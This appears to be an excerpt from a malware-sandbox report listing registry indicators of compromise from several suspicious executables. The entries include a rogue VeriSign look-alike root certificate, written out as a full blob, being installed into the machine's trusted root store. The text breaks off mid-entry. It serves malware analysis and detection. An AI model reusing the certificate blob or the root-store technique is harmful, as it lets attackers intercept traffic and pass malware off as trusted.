\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople 9NeY7wDiJGhrvsW_GspXT3lp.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-252 = "Dateline Standard Time" 9NeY7wDiJGhrvsW_GspXT3lp.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1842 = "Russia TZ 4 Standard Time" 9NeY7wDiJGhrvsW_GspXT3lp.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-631 = "Tokyo Daylight Time" 9NeY7wDiJGhrvsW_GspXT3lp.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2572 = "Turks and Caicos Standard Time" 9NeY7wDiJGhrvsW_GspXT3lp.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\OnDemandInterfaceCache svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-2001 = "Cabo Verde Daylight Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-1831 = "Russia TZ 2 Daylight Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-382 = "South Africa Standard Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-1041 = "Ulaanbaatar Daylight Time" mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-151 = "Central America Daylight Time" 9NeY7wDiJGhrvsW_GspXT3lp.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust Esplorarne.exe.com Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-2182 = "Astrakhan Standard Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-1862 = "Russia TZ 6 Standard Time" mask_svc.exe -
Modifies registry class 64 IoCs
Processes:
Esplorarne.exe.comMicrosoftEdge.exeEsplorarne.exe.comEsplorarne.exe.comEsplorarne.exe.comMicrosoftEdge.exeMicrosoftEdgeCP.exeMicrosoftEdge.exeMicrosoftEdgeCP.exeWerFault.exeMicrosoftEdge.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exesvchost.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exesc.exedescription ioc process Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\VersionLow = "0" Esplorarne.exe.com Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-VersionLow = "0" Esplorarne.exe.com Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\CA MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\Disallowed\CTLs MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU Esplorarne.exe.com Set value (str) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" Esplorarne.exe.com Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\Main Esplorarne.exe.com Set value (data) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 3ff00d30e598d701 MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\DynamicCodePolicy = 05000000 MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\Internet Settings\Cache\Cookies Esplorarne.exe.com Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus Esplorarne.exe.com Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\PrivacyAdvanced = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\SplashScreen Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\AllComplete = "1" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Content\CacheLimit = "256000" MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\History\CachePrefix = "Visited:" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings WerFault.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingDelete Esplorarne.exe.com Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FlipAhead MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery\ReadingStorePending = "1" MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\History\CachePrefix = "Visited:" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Software\Microsoft\SystemCertificates\Root MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs MicrosoftEdgeCP.exe Set value (str) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\Internet Settings\Cache\Content\CachePrefix Esplorarne.exe.com Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\Internet Settings\Cache\Cookies\CacheLimit = "1" Esplorarne.exe.com Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main\DisallowDefaultBrowserPrompt = "0" Esplorarne.exe.com Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\CIPolicyState = "0" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\CA\Certificates MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\InternetRegistry MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\CIPolicyState = "0" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery\Active = "0" Esplorarne.exe.com Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\TreeView = "1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Software\Microsoft\SystemCertificates\trust\CTLs MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Rating MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\Extensible Cache MicrosoftEdgeCP.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{IY7880QH-GQ0R-SG6F-75Z5-PGQ2S76C3D6F}\650478DC7424C37C svchost.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Toolbar\WebBrowser MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\CIStatus\SignaturePolicy = 06000000 MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Software\Microsoft\SystemCertificates\trust MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DummyPath\dummySetting = "1" MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\AdapterInfo = "vendorId=\"0x1414\",deviceID=\"0x8c\",subSysID=\"0x0\",revision=\"0x0\",version=\"10.0.15063.0\"hypervisor=\"No Hypervisor (No SLAT)\"" Esplorarne.exe.com Set value (data) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\CIStatus\SignaturePolicy = 06000000 MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\Internet Settings\Cache\History\CacheLimit = "1" Esplorarne.exe.com Set value (data) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\DynamicCodePolicy = 05000000 MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery\ReadingStorePending = "1" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\PrivacyAdvanced = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\Cookies\CacheLimit = "1" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\SmartScreenCompletedVersion = "1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Zoom MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\SubSysId = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Software\Microsoft\SystemCertificates\trust MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\CA\CTLs MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Software\Microsoft\SystemCertificates\CA\Certificates MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Software\Microsoft\SystemCertificates\Root\CTLs MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\TreeView = "1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\ACGStatus sc.exe -
Processes:
Setup.tmpEsplorarne.exe.comRUNDLL32.EXERUNDLL32.EXEFBFC.exeEsplorarne.exe.comdescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\5E66E0CA2367757E800E65B770629026E131A7DC Setup.tmp Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\CBC64D0FC770B1694DF723BB18B5679CE09B61CA\Blob = 0f00000001000000200000002dc1a6a6cb0cb42f7e0d2c56f38bc7decbccd143405f669070ce130f9249ba48030000000100000014000000cbc64d0fc770b1694df723bb18b5679ce09b61ca20000000010000000c06000030820608308204f0a00302010202100ebd24bdfbd4adddd2edd27e8fb1953c300d06092a864886f70d01010b0500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b302906035504031322446967694365727420455620436f6465205369676e696e6720434120285348413229301e170d3136303230393030303030305a170d3139303231333132303030305a3082011d311d301b060355040f0c1450726976617465204f7267616e697a6174696f6e31133011060b2b0601040182373c0201031302555331193017060b2b0601040182373c020102130844656c61776172653110300e06035504051307333736313235363129302706035504091320353938302053746f6e6572696467652044726976652c20537569746520313033310e300c060355041113053934353838310b3009060355040613025553311330110603550408130a43616c69666f726e6961311330110603550407130a506c656173616e746f6e31233021060355040a131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e312330210603550403131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e30820122300d06092a864886f70d01010105000382010f003082010a0282010100dbfa60e717145ef04d047ef2824532ee8a363d6b8fda58b639832f07eccba53b0446715d150e886195607af12d04e77a0f90bca14e70a782603b0ee5b9dca6cf43d5befb9887c54a3a507a82c7dd4a3fec3aed83171ff020b0c1ca50b87751a597b13454a31bd07796eea97ee55631a43d92cbc7275dfc6da478de5f3c8e2c3431db592d2410de2e789465cf73498df4e042aaa085855603e5165b84e25f27c6d29f77a1cc7bf2875da81395715c662b0333b025b37fcac7bd2f3b50a497613d972182c25e796e0dc453264c6e5340bd4962d5d3d37db06dfc03efb0ba8215b9ef2ef52c15d369db3a732259d286a9aa761ccafff0558c8efdab678d785cfe370203010001a38201f1308201ed301f0603551d230418301680148fe87ef06d326a000523c770976a3a90ff6bead4301d0603551d0e041604149bb182bc8ec73483e7d3569d57448488d1803437302e0603551d1104273025a02306082b06010505070803a01730150c1355532d44454c41574152452d33373631323536300e0603551d0f0101ff04040302078030130603551d25040c300a06082b06010505070303307b0603551d1f047430723037a035a0338631687474703a2f2f63726c332e64696769636572742e636f6d2f4556436f64655369676e696e67534841322d67312e63726c3037a035a0338631687474703a2f2f63726c342e64696769636572742e636f6d2f4556436f64655369676e696e67534841322d67312e63726c304b0603551d2004443042303706096086480186fd6c0302302a302806082b06010505070201161c68747470733a2f2f7777772e64696769636572742e636f6d2f4350533007060567810c0103307e06082b0601050507010104723070302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d304806082b06010505073002863c687474703a2f2f636163657274732e64696769636572742e636f6d2f44696769436572744556436f64655369676e696e6743412d534841322e637274300c0603551d130101ff04023000300d06092a864886f70d01010b050003820101006c24a9a7e30a7db2301b344f60cd1b1daf32fce4207ff625bd635f062f8a65301a7d66fade8ba809d0863421631692ef527119eaed4d1f012a98606727c8682aaf1099ca03ab9e996184f4186bce0ca7739c9e6e7144972012ac6eb4ac7db2122b244546f09647fa477a0613401f42e72f4a56fd687d946c4a41e1d1238fe8959e0b6e0cb692e92d96ccc7bde669843c60a374d001608328688790f65ababb20c78c59dad5b32bd79d67c60341c754eae510e08f897e6190c3af2d171261bcea2905545682ace869cd7cc3e66e635dd4f6420dcdc0909b780456523f685aec28b7a5585fae78f36ae3b84d0690f5ee0aa522245546508b2fadb6975f6082d11f Esplorarne.exe.com Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\5E66E0CA2367757E800E65B770629026E131A7DC Esplorarne.exe.com Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\EDD4B1559255EDD0ADB9D0DA108ABA221CA10AB4\Blob = 030000000100000014000000edd4b1559255edd0adb9d0da108aba221ca10ab42000000001000000ec020000308202e830820251a003020102020874af2d9114d41e4b300d06092a864886f70d01010b05003081863146304406035504030c3d56653072695369676e20436c6173732033205075626c6963205072696d6172792043657274696669636174696f6e20417574686f72697479202d204735311b3019060355040b0c1222286329203230303620566572695369676e31123010060355040a0c0922566572695369676e310b3009060355040613025553301e170d3139303832353132323332315a170d3233303832343132323332315a3081863146304406035504030c3d56653072695369676e20436c6173732033205075626c6963205072696d6172792043657274696669636174696f6e20417574686f72697479202d204735311b3019060355040b0c1222286329203230303620566572695369676e31123010060355040a0c0922566572695369676e310b300906035504061302555330819f300d06092a864886f70d010101050003818d0030818902818100c91e94712e8fb5b2578f14350940415f7b86ad019031c2c6ac9fdfec47cff9d93a4046627d16c817aa0d994fc25280487e82fe650d87992b56240dfbbd3828e5d311112248379a4e54121b4c37e7c32fbff13f32834c35095d76a4f3e220223abe36bb5c22870f46aea1c377ceeae9e476aaa8ca4e26c9262985bb671609353b0203010001a35d305b300f0603551d130101ff040530030101ff30480603551d110441303f823d56653072695369676e20436c6173732033205075626c6963205072696d6172792043657274696669636174696f6e20417574686f72697479202d204735300d06092a864886f70d01010b050003818100723d1aa0711e110572274040b91a24679030b90bccf2f219dabf7c677b66c8765294490d43caf97282745aebae8afe65c68fc1e8eb4b976ae3bbb2a0c7d4b5bae7be02a1ae00f31a78d7f9f6375665d0ffaad4794de71eb03014b8709a7b806fbbb1f0395fa8f4e672c95a103017dee4df89e4789ec4fafecf1ae2af4087af56 RUNDLL32.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\EDD4B1559255EDD0ADB9D0DA108ABA221CA10AB4 RUNDLL32.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\EDD4B1559255EDD0ADB9D0DA108ABA221CA10AB4\Blob = 030000000100000014000000edd4b1559255edd0adb9d0da108aba221ca10ab42000000001000000ec020000308202e830820251a003020102020874af2d9114d41e4b300d06092a864886f70d01010b05003081863146304406035504030c3d56653072695369676e20436c6173732033205075626c6963205072696d6172792043657274696669636174696f6e20417574686f72697479202d204735311b3019060355040b0c1222286329203230303620566572695369676e31123010060355040a0c0922566572695369676e310b3009060355040613025553301e170d3139303832353132323332315a170d3233303832343132323332315a3081863146304406035504030c3d56653072695369676e20436c6173732033205075626c6963205072696d6172792043657274696669636174696f6e20417574686f72697479202d204735311b3019060355040b0c1222286329203230303620566572695369676e31123010060355040a0c0922566572695369676e310b300906035504061302555330819f300d06092a864886f70d010101050003818d0030818902818100c91e94712e8fb5b2578f14350940415f7b86ad019031c2c6ac9fdfec47cff9d93a4046627d16c817aa0d994fc25280487e82fe650d87992b56240dfbbd3828e5d311112248379a4e54121b4c37e7c32fbff13f32834c35095d76a4f3e220223abe36bb5c22870f46aea1c377ceeae9e476aaa8ca4e26c9262985bb671609353b0203010001a35d305b300f0603551d130101ff040530030101ff30480603551d110441303f823d56653072695369676e20436c6173732033205075626c6963205072696d6172792043657274696669636174696f6e20417574686f72697479202d204735300d06092a864886f70d01010b050003818100723d1aa0711e110572274040b91a24679030b90bccf2f219dabf7c677b66c8765294490d43caf97282745aebae8afe65c68fc1e8eb4b976ae3bbb2a0c7d4b5bae7be02a1ae00f31a78d7f9f6375665d0ffaad4794de71eb03014b8709a7b806fbbb1f0395fa8f4e672c95a103017dee4df89e4789ec4fafecf1ae2af4087af56 RUNDLL32.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\EDD4B1559255EDD0ADB9D0DA108ABA221CA10AB4 FBFC.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\EDD4B1559255EDD0ADB9D0DA108ABA221CA10AB4\Blob = 